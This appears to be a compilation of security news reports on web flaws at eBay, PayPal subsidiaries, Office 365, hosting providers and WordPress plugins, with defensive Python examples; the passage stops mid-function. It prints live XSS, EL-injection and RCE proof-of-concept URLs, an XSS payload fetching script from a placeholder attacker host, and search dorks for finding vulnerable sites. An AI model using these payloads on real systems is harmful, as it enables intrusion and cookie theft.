Researcher finds vulnerability in eBay and claims he uploaded a shell

 
Jordan Jones (@CEHSecurity), a security researcher, claims to have discovered a critical vulnerability in an eBay website for employees that allowed him to upload a backdoor shell.

Jordan said in his tweet that he had notified eBay of the vulnerability. A screenshot published on his Twitter account shows that he was able to upload a 'shell.php' file at the following location:

"https://dsl.ebay.com/wp-includes/Text/Diff/Engine/shell.php"

At the time of writing, the file is still there. Its last-modified date is December 2012, but timestamps are easy to alter, so we cannot tell how long the file has actually been there.

Requesting the file returns a blank page. That means either the researcher modified the shell so that it only runs when a particular input is passed, or it is not a shell at all.

Jordan has also discovered a cross-site scripting vulnerability in the eBay Research Labs page (labs.ebay.com).

Critical SSRF vulnerability in PayPal subsidiary allows access to internal network

Shubham Shah, a web application pentester from Australia, has discovered a critical Server Side Request Forgery (SSRF) vulnerability in the Bill Me Later website, a subsidiary of PayPal. The vulnerability exists in the subdomain merchants.billmelater.com.

"The vulnerability itself was found within a test bed for BillMeLater’s SOAP API, which allowed for queries to be made to any given host URL," the researcher explained in his blog post.

An attacker could send requests to hosts on the internal network through the API and read the responses. Some internal admin pages allowed him to query internal databases without any login credentials.

The researcher says that successful exploitation could have compromised customer data.

The bug was reported to PayPal in October 2013 and he received a reward from them in January 2014.

PayPal has partially fixed the bug by blocking the SOAP API from reaching the internal servers. However, the researcher says it still acts as a proxy for requests to other hosts.

If you would like to know more about SSRF and how it can be used for port scanning or internal network discovery, refer to Riyaz Walikar's blog post and this document.

Expression Language (EL) Injection vulnerability in PayPal subsidiary

Indian security researcher Piyush Malik has discovered an Expression Language (EL) injection flaw in Zong, a subsidiary of PayPal.

According to OWASP, EL injection is a vulnerability that lets an attacker control the data passed to the EL interpreter. In some cases it allows arbitrary code execution on the server.

Malik said in his blog that Zong was running an outdated version of Clearspace (now known as Jive software) on a subdomain.

"Clearspace is a knowledge management tool and is integrated with Spring Framework. EL pattern was used in Spring JSP tags which made Clearspace vulnerable to this bug," Malik explained in his blog.

He found two forms on the site that were vulnerable to this bug, and he was able to perform arithmetic operations through the vulnerable field.

One of the vulnerable URLs:
https://clearspace.zong.com/login!input.jspa?unauth=${custom command here}

An attacker can inject an Expression Language expression into the 'unauth' parameter, and it is evaluated on the server. In his demo, the researcher injected an arithmetic expression (https://clearspace.zong.com/login!input.jspa?unauth=${100*3}) and had it evaluated.

PayPal has paid a bounty for the finding; the researcher did not disclose the amount.

EL injection was first documented by security researchers from Minded Security in 2011. Their paper is available here: https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf

CVE-2014-0050: Apache Tomcat vulnerable to Denial of Service attack

If you are a developer, be careful when writing loops, especially unbounded loops [for(;;) or while(true)] whose only exit is an 'if' statement.

Security researchers from Trustwave have explained how such a 'for' loop resulted in a denial-of-service vulnerability that allows attackers to launch DoS attacks against websites hosted on Apache Tomcat servers.

The vulnerability (CVE-2014-0050) is located in Apache Commons FileUpload. The 'for' loop in question is written so that it exits only by raising an exception or by returning a value.

An attacker can send a malformed 'Content-Type' header on a multipart request that causes the loop to run forever.

Multipart encoding is commonly used in HTTP requests for uploading files. The parts of a multipart request are separated by a delimiter line called the "boundary", a random string declared in the 'Content-Type' header.

By sending a boundary longer than 4091 characters and a body longer than 4096 characters, the attacker ensures that neither of the two 'if' statements that would stop the 'for' loop is ever satisfied.

Trustwave researchers sent a request containing more than 4091 characters in the boundary field four times, forcing the vulnerable Tomcat server into an infinite loop. As a result the Tomcat server consumes all available CPU until it is stopped.
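The defensive counterpart is to reject a malformed multipart header before the body parser ever sees it. The following is an added example written for this article, not Trustwave's code or Apache's fix: it parses a Content-Type value and enforces the RFC 2046 limits on the boundary (at most 70 characters, a fixed character set, no trailing space), which a 4091-character boundary fails by a wide margin. The sample headers are constructed.

```python
import re

# RFC 2046 section 5.1.1: a boundary is 1..70 characters from a fixed set
# and must not end with a space.  The 4091-character boundary described in
# the article is far outside what any conforming client sends.
MAX_BOUNDARY_LEN = 70
BOUNDARY_RE = re.compile(r"^[0-9A-Za-z'()+_,\-./:=? ]+$")


def parse_content_type(header):
    """Split a Content-Type value into (media_type, {param: value})."""
    parts = [p.strip() for p in header.split(";")]
    media_type = parts[0].lower()
    params = {}
    for part in parts[1:]:
        name, sep, value = part.partition("=")
        if sep:
            params[name.strip().lower()] = value.strip().strip('"')
    return media_type, params


def check_multipart_boundary(header):
    """Return (ok, reason) for a Content-Type header value.

    Non-multipart requests pass untouched; multipart requests must carry a
    boundary that satisfies the RFC limits, otherwise the request should be
    answered with 400 before any body parsing starts."""
    media_type, params = parse_content_type(header)
    if not media_type.startswith("multipart/"):
        return True, "not multipart"
    boundary = params.get("boundary")
    if boundary is None:
        return False, "multipart without boundary"
    if len(boundary) > MAX_BOUNDARY_LEN:
        return False, "boundary longer than %d characters" % MAX_BOUNDARY_LEN
    if boundary.endswith(" ") or not BOUNDARY_RE.match(boundary):
        return False, "boundary outside the RFC 2046 character set"
    return True, "ok"


# Constructed headers: a normal browser upload, an oversized boundary,
# a multipart header with no boundary at all, and a non-multipart request.
SAMPLE_HEADERS = {
    "browser": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "oversized": "multipart/form-data; boundary=" + "A" * 4092,
    "no_boundary": "multipart/form-data",
    "json": "application/json",
}

if __name__ == "__main__":
    for label, header in SAMPLE_HEADERS.items():
        print(label, check_multipart_boundary(header))
```

The check is cheap enough to run in a filter or reverse proxy in front of every upload endpoint; the parser behind it then only ever sees boundaries it was designed for.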

Thousands of Joomla websites using JomSocial vulnerable to Remote Code Execution

Thousands of Joomla websites using JomSocial are vulnerable to a remote code execution flaw. JomSocial is a social networking extension for the Joomla CMS.

The extension is currently listed on Joomla's Vulnerable Extensions list. The vulnerability is being exploited in the wild; several users have reported that someone broke into their websites.

According to JomSocial, hackers breached the JomSocial website itself by exploiting this vulnerability. JomSocial's security team spotted the attack and released a patch. While analyzing the vulnerability being exploited, they also discovered another critical vulnerability.

The vulnerability was discovered by security researcher Matias Fontanini, who notified JomSocial. At first the team said they had fixed the issue in 3.1.0.1; however, the researcher found that 3.1.0.1 was also vulnerable.

Vulnerability Details:
The vulnerability is located in the 'photos' controller, 'ajaxUploadAvatar' task. The parameters parsed by the 'Azrul' plugin are not properly sanitized before being used in a call to the 'call_user_func_array' PHP function.

"This allows an attacker to execute arbitrary static class functions, using any amount of user-provided parameters." An attacker can exploit this by calling the CStringHelper::escape function to execute arbitrary PHP code.
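The bug class here is call-by-name dispatch on a request-supplied string. The following added example, written for this article in Python rather than PHP and not JomSocial's code, reproduces the pattern with a module-level function lookup (the equivalent of call_user_func_array on a user-controlled name) and puts an explicit allowlist beside it. All function names and the audit log are constructed for the demonstration.

```python
import html

# Constructed module: two tasks a request may legitimately invoke, and one
# internal helper that must never be reachable from a request.
AUDIT_LOG = []


def format_username(name):
    """Public task: normalise a display name."""
    return name.strip().lower()


def escape_for_page(text):
    """Public task: HTML-escape text before it is rendered."""
    return html.escape(text, quote=True)


def reset_password(username):
    """Internal helper; reaching it from a request is the vulnerability."""
    AUDIT_LOG.append("password reset for %s" % username)
    return "reset:" + username


def dispatch_unsafe(task, args):
    """The pattern described above: the task name and its arguments come
    straight from the request, the name is resolved against every function
    in scope, and the arguments are splatted into the call.  Any callable
    in this module, reset_password included, is therefore reachable."""
    func = globals().get(task)
    if not callable(func):
        raise ValueError("unknown task %r" % task)
    return func(*args)


# Explicit allowlist: task name -> (callable, number of arguments).
ALLOWED_TASKS = {
    "format_username": (format_username, 1),
    "escape": (escape_for_page, 1),
}


def is_permitted(task):
    return task in ALLOWED_TASKS


def dispatch_safe(task, args):
    """Resolve only through the allowlist and check the argument count
    instead of forwarding whatever the request supplied."""
    if not is_permitted(task):
        raise PermissionError("task not permitted: %r" % task)
    func, arity = ALLOWED_TASKS[task]
    if len(args) != arity:
        raise ValueError("task %r expects %d argument(s)" % (task, arity))
    return func(*args)


if __name__ == "__main__":
    print(dispatch_unsafe("reset_password", ["alice"]))  # reachable: the bug
    print(dispatch_safe("escape", ["<b>hi</b>"]))
    print(is_permitted("reset_password"))                 # False
```

The allowlist is the whole fix: the set of callables a request may name is decided by the developer at write time, not by whatever happens to be loaded at run time.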

HTTP Request exploiting the vulnerability

More technical details about the vulnerability and the exploit code are available here.

Since exploit code is already publicly available, all JomSocial administrators are advised to upgrade to the latest version of the extension (v3.1.0.4) as soon as possible.

Critical Remote Code Execution vulnerability patched in MediaWiki, affecting Wikipedia

A critical remote code execution vulnerability has recently been patched in the MediaWiki wiki software. Thousands of wiki sites, including Wikipedia, were affected by this bug.

Security researchers from Check Point identified the vulnerability (CVE-2014-1610), which affects all versions from 1.8 onwards. Sites are vulnerable only if a specific non-default setting is enabled.

According to the security advisory, an attacker could have exploited this vulnerability to make file and system changes and gain complete control of the server.

Check Point said an attacker could have injected malicious code into every page on Wikipedia.org, putting millions of users' systems at risk of malware infection.

Fortunately, Check Point immediately informed the Wikimedia Foundation of the bug, and on 28 January the foundation released a patch.

The security advisory says that this is the third critical remote code execution vulnerability discovered in MediaWiki since 2006.

Persistent XSS vulnerability in Office 365 website allows takeover of admin account

The firm Cogmotive has discovered a potentially critical persistent cross-site scripting (XSS) vulnerability in Office 365, the cloud version of Office. Successful exploitation allows an attacker to take control of an administrator account.

To exploit the vulnerability the attacker has to be one of the tenant's users: a malicious employee can set their own display name to an XSS payload.

For instance, an attacker can set his display name to the following script:

/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("https://[attacker_website]/exploit/b.js", function() { c(); });'>'

The user administration page lists the users in the portal, so when a user changes his name the new name is rendered on that page.

When an administrator logs into the portal and opens the "User administration" page, the payload executes: it loads the malicious JavaScript file hosted on the attacker's server and runs it.

An attacker can use this to create a new administrator within the company’s Office 365 environment.

"It is worth noting that this weakness seems to have been introduced recently within the new Wave 15 version of Office 365," Alan Byrne, co-founder of Cogmotive, said on the company's blog.

Alan reported the bug to Microsoft in October 2013, and Microsoft patched it in December 2013.

Thousands of websites infected via Vulnerability in WordPress OptimizePress Theme

A file upload vulnerability in the OptimizePress theme allowed attackers to infect thousands of WordPress websites, reports Sucuri.

The vulnerable file is "lib/admin/media-upload.php", which allows anyone to upload files of any type to the "wp-content/uploads/optpress/images_comingsoon" folder.
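Both this item and the eBay 'shell.php' upload at the top of the page come down to an upload handler that accepts any file into a web-served directory. The following added example, written for this article and not the theme's or eBay's code, shows the server-side check an image upload endpoint should make: allowlist the extension, verify the file's leading bytes match that type, and strip directory components from the supplied name. The file names, limits and sample bytes are constructed.

```python
import os
import re

# Allowed image types and the magic bytes each must start with.  A PHP
# script renamed to .png fails the content check even though the extension
# passes.  Values constructed for the example.
ALLOWED_TYPES = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}
SAFE_STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


def validate_upload(filename, data):
    """Return (accepted, stored_name_or_reason) for one upload."""
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    # Drop any directory part, whether POSIX or Windows separators were used,
    # so "../../wp-includes/x.png" is stored as plain "x.png".
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed: %r" % ext
    if not SAFE_STEM_RE.match(stem):
        # Also rejects "shell.php.png": its stem would contain a dot.
        return False, "unsafe file name"
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not look like %s" % ext
    return True, stem + ext


# Constructed sample uploads: a minimal PNG header and a script placeholder.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SCRIPT_BYTES = b"<?php /* constructed placeholder */ ?>"

if __name__ == "__main__":
    for name, data in [("logo.png", PNG_BYTES), ("shell.php", SCRIPT_BYTES),
                       ("shell.php.png", PNG_BYTES), ("disguised.png", SCRIPT_BYTES)]:
        print(name, validate_upload(name, data))
```

Independently of this check, the upload directory itself should be served with script execution disabled, so that even a file that slips through is delivered as static content rather than run by the interpreter.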

The Sucuri team has detected that more than 2,000 websites using the OptimizePress theme have been compromised. All of the compromised sites have had an iframe pointing to the same malicious domain injected into them.

Almost 75% of the infected websites have already been blacklisted by Google Safe Browsing.

If you are using this theme, you are urged to upgrade to the latest version immediately; otherwise you will soon find your site infected with malware.

Vulnerability in Drupal allows hackers to compromise admin accounts

A highly critical vulnerability has been identified in the OpenID module shipped with Drupal, affecting the 6.x and 7.x versions.

The vulnerability allows an attacker to compromise any account, including the admin account.

A second vulnerability, an "access bypass" rated moderately critical, can be exploited by an attacker to view unpublished content.

Both vulnerabilities have been patched in the latest releases, Drupal 6.30 and 7.26. These releases add no new features, but users are advised to upgrade.

"[The first] vulnerability is mitigated by the fact that the malicious user must have an account on the site (or be able to create one), and the victim must have an account with one or more associated OpenID identities," the security advisory reads.

Remote Code Execution vulnerability in eBay website

David Vieira-Kurz, a security researcher from Germany, has discovered an interesting remote code execution vulnerability in the eBay website.

The 'q' parameter of the search page on the South Asian eBay domain (sea.ebay.com/search/?q=david&catidd=1) was found to be vulnerable to remote code execution.

The researcher passed the 'q' parameter as an array containing a command, and the command was executed.

The researcher's proof of concept prints information about the PHP installation on the server:
  sea.ebay.com/search/?q[0]=david&q[1]=sec{${phpinfo()}}&catidd=1

An attacker could have exploited this vulnerability to run OS commands and compromise the entire server. David reported it to the eBay security team and it has since been fixed.
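This finding and the Zong EL injection above share a defensive lesson: a parameter the application expects as a plain string should be rejected when it arrives as an array (q[0]=..., q[1]=...) or when its value carries expression delimiters (${...}, #{...}, {$...}) that a downstream interpreter might evaluate. The following added example, written for this article and not eBay's or Zong's code, implements that gate over a raw query string; the parameter names it expects are taken from the URLs quoted on this page, everything else is constructed.

```python
import re
from urllib.parse import parse_qsl

# Delimiters of the template/expression syntaxes involved on this page:
# Spring/JSP EL "${" and "#{", and PHP's complex string syntax "{$".
EXPRESSION_RE = re.compile(r"\$\{|#\{|\{\$")
# "q[0]", "q[]", "q[foo]": an array-style key for base name "q".
ARRAY_KEY_RE = re.compile(r"^([^\[]+)\[")


class BadParameter(ValueError):
    pass


def get_scalar_params(query, expected):
    """Return {name: value} for the names in `expected`.

    Raise BadParameter for array-style keys, duplicate keys or values that
    contain expression syntax.  Parameters not in `expected` are ignored,
    so the caller only ever sees the inputs it declared."""
    out = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        match = ARRAY_KEY_RE.match(raw_key)
        name = match.group(1) if match else raw_key
        if name not in expected:
            continue
        if match:
            raise BadParameter("%r must be a scalar, got array key %r" % (name, raw_key))
        if name in out:
            raise BadParameter("%r supplied more than once" % name)
        if EXPRESSION_RE.search(value):
            raise BadParameter("%r contains expression syntax" % name)
        out[name] = value
    return out


def reject_reason(query, expected):
    """None if the query passes, otherwise the rejection message."""
    try:
        get_scalar_params(query, expected)
        return None
    except BadParameter as exc:
        return str(exc)


if __name__ == "__main__":
    for q in ["q=david&catidd=1", "q[0]=david&q[1]=x&catidd=1", "unauth=${100*3}"]:
        print(q, "->", reject_reason(q, {"q", "catidd", "unauth"}))
```

Note that parse_qsl percent-decodes values first, so an encoded `%24%7B` is caught the same as a literal `${`. The gate is a backstop: the real fix in both cases is never to hand user input to an expression evaluator at all.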

He also discovered a SQL Injection vulnerability in the same domain last year.

The full technical details are available here.

OpenEMR affected by Multiple Vulnerabilities

OpenEMR, the most popular open source electronic medical records system, is reported by Trustwave SpiderLabs to have multiple vulnerabilities.

The report says that with guest access, combined with several application issues, the researcher was able to compromise the server running OpenEMR and then use it as a foothold for attacking the internal network.

The researcher found a SQL injection vulnerability in the "Reports > Visits > SuperBill > Dates" page.

"By browsing to this page and dumping in junk in either the start or end date parameters," he saw the SQL error message "ERROR: query failed: select * from forms where form_name = 'New Patient Encounter' and date between 'a'' and '2013-07-12' order by date DESC".
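The error message shows the shape of the bug: the date values are spliced into the SQL text, so a stray quote breaks the statement (and a crafted one would change it). The following added example, written for this article against an in-memory SQLite table and not OpenEMR's code or schema, reconstructs that query in its concatenated form beside a version that validates the dates and binds them as parameters. The table and rows are constructed.

```python
import sqlite3
from datetime import date

REPORT_FORM = "New Patient Encounter"


def build_db():
    """Constructed table with the columns the quoted query refers to."""
    con = sqlite3.connect(":memory:")
    con.execute("create table forms (form_name text, date text, encounter integer)")
    con.executemany("insert into forms values (?, ?, ?)", [
        (REPORT_FORM, "2013-07-01", 1),
        (REPORT_FORM, "2013-07-10", 2),
        ("Vitals", "2013-07-05", 3),
    ])
    return con


def visits_unsafe(con, start, end):
    """The vulnerable shape: dates concatenated into the SQL text."""
    sql = ("select * from forms where form_name = '%s' and date between '%s' and '%s' "
           "order by date DESC" % (REPORT_FORM, start, end))
    return con.execute(sql).fetchall()


def parse_iso_date(value):
    """Accept only a calendar date; anything else raises ValueError."""
    return date.fromisoformat(value).isoformat()


def visits_safe(con, start, end):
    """Validated input, bound as parameters: the database never sees the
    user's text as part of the statement."""
    start, end = parse_iso_date(start), parse_iso_date(end)
    return con.execute(
        "select * from forms where form_name = ? and date between ? and ? order by date DESC",
        (REPORT_FORM, start, end),
    ).fetchall()


def unsafe_error_for(start, end):
    """Database error text the concatenated query produces, or None."""
    try:
        visits_unsafe(build_db(), start, end)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def safe_result_for(start, end):
    """Rows for valid dates, or the string 'rejected' for junk input."""
    try:
        return visits_safe(build_db(), start, end)
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    print(unsafe_error_for("a'", "2013-07-12"))   # database syntax error
    print(safe_result_for("a'", "2013-07-12"))    # rejected before any query
    print(safe_result_for("2013-07-01", "2013-07-12"))
```

The parameterised version also never echoes a database error to the user, which is what made the original flaw discoverable from the browser.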

He also claims to have dumped most of the database contents, including sensitive patient data and numerous usernames and passwords. "I let my GPU box chew on the password hashes for a bit, and kept poking at the application," the blog says.

OpenEMR is also reported to have an HTML injection/XSS flaw on the 'Office Notes' page. The researcher was able to trick users visiting the page into attempting authentication against his system, which was hosting a fake SMB server with static challenges:

Image Credits: SpiderLabs

"This allowed me to capture a handful of domain usernames and password hashes. In addition, I had some luck cracking the OpenEMR password hashes from earlier, and some of the passwords were re-used locally on the Linux system hosting OpenEMR, allowing me access via SSH," SpiderLabs reports.

OpenEMR has been informed and has fixed the vulnerabilities in the latest 4.1.1 patch.

Author: Shalini Bhushan

Reflected XSS vulnerability affects Millions of sites hosted on HostMonster

We recently reported a reflected cross-site scripting vulnerability in the HostGator India hosting site that affects millions of hosted sites. Today another Indian security researcher, Ramneek Sidhu, comes with a similar find.

Ramneek Sidhu has discovered a reflected XSS vulnerability in one of the biggest web hosting sites, HostMonster (hostmonster.com). Just as in the previous case, this vulnerability affects all sites hosted on HostMonster.

The vulnerability was discovered in a HostMonster subdomain:
http://host104.hostmonster.com/"><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT>alert("Evolution of Revolution")</script><img src="http://i49.tinypic.com/1zq7cyp.jpg /" />

The researcher reported the vulnerability to Aarshit Mittal, who analyzed it and found a few more interesting things: every website hosted on HostMonster is vulnerable to the reflected XSS.

The list of sites hosted on HostMonster can be obtained by searching for "Ip:ip:74.220.207.104" in Bing. This single IP search gives 36,000 results, and all of those sites are affected by the flaw. Take "vividhbharti.com" as an example.

The PoC for this site is:
http://vividhbharti.com/"><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT>alert("Evolution of Revolution")</script><img src="http://i49.tinypic.com/1zq7cyp.jpg /" />

At EHN, I have just analyzed the affected sites to find out what causes this security flaw. It seems the flaw occurs when the developer tries to display ads on the 404 Not Found page.

A piece of JavaScript generates the ads. Interestingly, the code uses the referrer, which here is the current address. Unfortunately the developers failed to sanitize the URL, and the result is reflected XSS.
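Two items on this page, the Office 365 display name and this 404-page ad script, fail the same way: a value (stored in one case, reflected from the URL in the other) is written into markup without output encoding. The following added example, written for this article and not either vendor's code, renders a user list with and without HTML escaping, and reflects a referrer URL into a link only after checking its scheme and escaping it for the attribute context. The rows, the payload (a shortened constructed one in the shape of those quoted above) and the URLs are all constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed user rows; the second display name closes the surrounding
# tag and adds an event handler, like the payloads quoted on this page.
USER_ROWS = [
    {"display_name": "Alice Example", "email": "alice@example.test"},
    {"display_name": '"><img src=x onerror=alert(1)>', "email": "mallory@example.test"},
]

ROW_TEMPLATE = "<tr><td>%s</td><td>%s</td></tr>"


def render_user_table_unsafe(rows):
    """Interpolates stored values straight into the markup."""
    body = "".join(ROW_TEMPLATE % (r["display_name"], r["email"]) for r in rows)
    return "<table>%s</table>" % body


def render_user_table(rows):
    """Escapes every stored value for the HTML text context first, so the
    browser shows the payload as text instead of parsing it as a tag."""
    body = "".join(
        ROW_TEMPLATE % (html.escape(r["display_name"], quote=True),
                        html.escape(r["email"], quote=True))
        for r in rows
    )
    return "<table>%s</table>" % body


def render_ad_link(referrer):
    """Reflect a referrer URL into an href attribute.

    Only http(s) URLs with a host are accepted (so javascript: and data:
    schemes are dropped), and the value is escaped for the attribute
    context, which turns the closing quote and any tag into text."""
    parts = urlsplit(referrer)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return '<a class="ad" href="%s">Sponsored</a>' % html.escape(referrer, quote=True)


if __name__ == "__main__":
    print(render_user_table_unsafe(USER_ROWS))
    print(render_user_table(USER_ROWS))
    print(render_ad_link('http://example.test/"><SCRIPT>alert(document.cookie)</SCRIPT>'))
```

The escaping function has to match the context it writes into (text, attribute, URL, script); html.escape covers the first two, which is exactly where both of these bugs sit.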

Millions of sites hosted on HostGator India vulnerable to Reflected XSS

HostGator, one of the leading web hosting providers, has been found vulnerable to a non-persistent cross-site scripting vulnerability. The vulnerability was discovered by Indian security researcher Manjot Gill. The finding was initially published on Cyber-N, the security news portal of my friend Aarshit Mittal.

Manjot discovered the vulnerability in a HostGator subdomain. He also claimed that many of the sites hosted on HostGator are vulnerable.

PoC for the subdomain XSS:
http://www.cluster2.hostgator.co.in/"><script>alert("HACKED BY ICH ")</script>

Aarshit Mittal analyzed the finding and discovered a few more interesting things.

Searching for "site:.hostgator.co.in" gives more than 64,600 results, and all of those subdomains are affected by this vulnerability. For example, take the first site in the results, "chahat.hostgator.co.in"; it is affected by the XSS.

POC:
chahat.hostgator.co.in/"><script>alert(document.cookie)</script>

You can also list the hosted sites by searching for the IP in Bing. For instance, searching for "ip:119.18.48.78" in Bing returns a list of affected sites.

The rest of the vulnerable sites can be found by changing the IP from "119.18.48.12" through to "119.18.48.86".

The main domain is also affected by this vulnerability:

     http://www.hostgator.co.in/"><script>alert(document.cookie)</script>

The affected sites are created and hosted via IndiaGetOnline (www.indiagetonline.in). "Get India Business Online" is an initiative by Google that lets you create a website for your business in 15 minutes, for free. HostGator provides the hosting, its site building tool, and support.

All the sites created with HostGator's site building tool are affected because the main site building site (hostgator.co.in) is itself affected by this flaw.

Stored XSS vulnerability in Facebook earns researcher $3,500 bug bounty

Security researcher Frans Rosén has discovered cross-site scripting vulnerabilities in Facebook and Dropbox.

Initially the researcher was looking for security flaws in Dropbox. He noticed that the web interface restricted which filenames were allowed: when he tried to rename a file to '"><img src=x onerror=alert(document.domain)>.txt he got an error message saying that some special characters are not allowed.

"But, if you instead, connected a local directory, created a file there and synced it, you got it inside Dropbox without any problems," the researcher explained in his blog. "Using this method I was able to find two issues with their notification messages showing unescaped filenames."

He notified Dropbox about the vulnerability and they have patched the flaw.

After some time he noticed that there is a connection between Dropbox and Facebook: you can add files directly from Dropbox to your Facebook groups. So he was curious to test the vulnerability in Facebook as well.

In his Facebook group he tried to add the file previously uploaded to Dropbox. After he posted it in the group the XSS did not fire, but when he clicked the 'Share' link on the post he got the alert: he had successfully run the script in Facebook. The XSS also worked when he shared a crafted pin from Pinterest.

The researcher received a $3,500 USD bug bounty for reporting the vulnerability, and Facebook has now fixed it.

W3 Total Cache vulnerability allows hackers to steal passwords and database info

Jason A. Donenfeld has discovered a critical vulnerability in the popular WordPress plugin "W3 Total Cache". The plugin improves the user experience of a site by improving server performance, caching every aspect of the site.

The cache data is stored in a publicly accessible directory, which means a malicious hacker can browse to it and download password hashes and other database contents.

A simple Google search for "inurl:wp-content/plugins/w3tc/dbcache" returns a list of WordPress sites affected by this vulnerability.

According to Jason, the cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable, even with directory listing off.

He also published a simple shell script to identify and exploit this bug:
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh

WordPress users are advised either to upgrade the plugin to the new version or to deny access to the plugin directory by adding an extra .htaccess file in that folder.

DNS Hijacking vulnerability found in 000webhost and other free hosting sites

Last month we learned that hackers had hijacked the Pakistani Google site and others by modifying their DNS records so that they pointed to a freehostia site where the attackers hosted the defacement page.

Now Indian security researcher Aarshit Mittal comes with an interesting find: he has discovered a critical DNS hijacking vulnerability in popular free web hosting providers. The vulnerability allows attackers to take control of hosted websites.

Aarshit has demonstrated the vulnerability in his blog. The attacker needs an account with the target web hosting provider; he explained the vulnerability using 000webhost.com.

Once the account is created, the attacker logs into cPanel, where the shared IP address is shown. Searching Bing for that IP address with some keywords returns the sites hosted on that IP.

Interestingly, Aarshit found some government sites (csirt.gov.bd) hosted on 000webhost.

Having obtained the list of hosted sites, the attacker can add those domain names as 'parked domains' in cPanel. cPanel let him add the domain name.

The hacker then only needs to upload a defacement page to his hosting account. Boom! The defacement page is now served from the victim's site, and he can also create any number of subdomains under the hijacked domain.
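The root cause is that the hosting panel attaches a domain to whichever account asks for it, with no proof that the account controls the domain. The following added example, written for this article and not 000webhost's or cPanel's code, shows the provider-side control that closes the hole: the account is issued a per-domain token, must publish it in a DNS TXT record, and the domain is parked only after the record is seen. The resolver is injected and the zone data constructed, so the example runs offline; the secret, label and account names are hypothetical.

```python
import hashlib
import hmac

# Hypothetical provider settings (constructed values).
SERVER_SECRET = b"constructed-secret-replace-in-production"
TXT_LABEL = "_hosting-verify"


def challenge_token(account_id, domain):
    """Token the account must publish for this domain.  Derived from the
    server secret, so it can be re-shown to the user on demand but cannot
    be produced by someone who does not hold the secret."""
    msg = ("%s|%s" % (account_id, domain.lower())).encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()[:32]


def verify_domain_ownership(account_id, domain, resolve_txt):
    """True only if TXT _hosting-verify.<domain> carries this account's
    token.  `resolve_txt(name)` returns the list of TXT strings at name."""
    expected = "hosting-verify=" + challenge_token(account_id, domain)
    try:
        records = resolve_txt("%s.%s" % (TXT_LABEL, domain.lower()))
    except Exception:
        return False  # resolution failure is not proof of ownership
    return any(hmac.compare_digest(r, expected) for r in records)


def park_domain(account_id, domain, resolve_txt, parked):
    """Attach `domain` to `account_id` in the `parked` map only after the
    ownership check passes.  Returns True on success."""
    if not verify_domain_ownership(account_id, domain, resolve_txt):
        return False
    parked.setdefault(account_id, set()).add(domain.lower())
    return True


# Constructed zone: the legitimate owner ("acct-owner") has published its
# token for example.test; nobody has published anything for other.test.
FAKE_ZONE = {
    "_hosting-verify.example.test": [
        "hosting-verify=" + challenge_token("acct-owner", "example.test")
    ],
}


def fake_resolve_txt(name):
    return FAKE_ZONE.get(name, [])


if __name__ == "__main__":
    parked = {}
    print(park_domain("acct-owner", "example.test", fake_resolve_txt, parked))     # True
    print(park_domain("acct-squatter", "example.test", fake_resolve_txt, parked))  # False
    print(parked)
```

Because the token is bound to the account as well as the domain, a second account cannot reuse a record the real owner published, and an account that never controlled the zone cannot publish one at all.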

By exploiting this security flaw, researcher successfully hijacked the following domain:

  • test.fraymamertoesquiu.gov.ar
  • test.concejodeitagui.gov.co
  • dns.hviota.gov.co
  • test.digitizeyou.in
  • men.csirt.gov.bd
  • bd.csirt.gov.bd

A malicious hacker could hijack millions of sites hosted on free web hosting services in this way. Aarshit tried to contact the affected companies, but they did not respond.

List of affected sites:

  • www.freehostia.com/
  • www.freewebhostingarea.com/
  • x10hosting.com/
  • www.110mb.com/

These are not the only ones; plenty of other free hosting providers are affected by this vulnerability.

WordPress Pingback Vulnerability Can Be Leveraged in DDoS Attacks

A pingback bug in the WordPress blogging platform can be exploited to launch distributed denial-of-service (DDoS) attacks, according to web application security firm Acunetix.

The vulnerability is exploitable through the platform’s XML-RPC API (xmlrpc.php).

A malicious hacker can spoof a pingback to a specific blog in order to enumerate hosts inside the target network, port scan those hosts, reconfigure internal routers or simply launch DDoS attacks.

The Acunetix team implemented a WVS script to test for this flaw. The script tries to resolve various common internal hostnames and connect to common ports, then reports the successful attempts.
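The pingback handler and the Bill Me Later SOAP test bed described earlier are the same kind of feature: the server fetches a URL supplied by an outsider. The defensive check both need is the same, so one added example serves both passages. It is written for this article and is not WordPress's or PayPal's code: it accepts only http(s) on standard ports, resolves the host (resolver injected, so it runs offline), and refuses any destination that maps to a loopback, private, link-local or otherwise non-public address, including IPv4-mapped IPv6 forms. The DNS data is constructed.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def is_public_address(ip_text):
    """True for addresses a server may legitimately reach on the Internet.
    Loopback, RFC 1918, link-local (169.254.0.0/16 included), ULA,
    multicast and unspecified addresses all return False.  IPv4-mapped
    IPv6 is unwrapped first so ::ffff:10.0.0.1 is judged as 10.0.0.1."""
    addr = ipaddress.ip_address(ip_text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not addr.is_multicast


def _is_ip_literal(host):
    try:
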